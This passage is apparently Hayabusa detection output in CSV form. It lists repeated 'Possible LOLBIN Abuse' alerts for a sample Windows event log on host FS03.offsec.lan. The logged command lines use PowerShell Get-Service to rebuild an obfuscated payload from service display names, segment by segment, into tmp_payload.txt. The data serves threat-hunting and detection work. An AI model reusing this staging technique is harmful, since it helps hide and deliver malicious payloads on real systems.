0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious 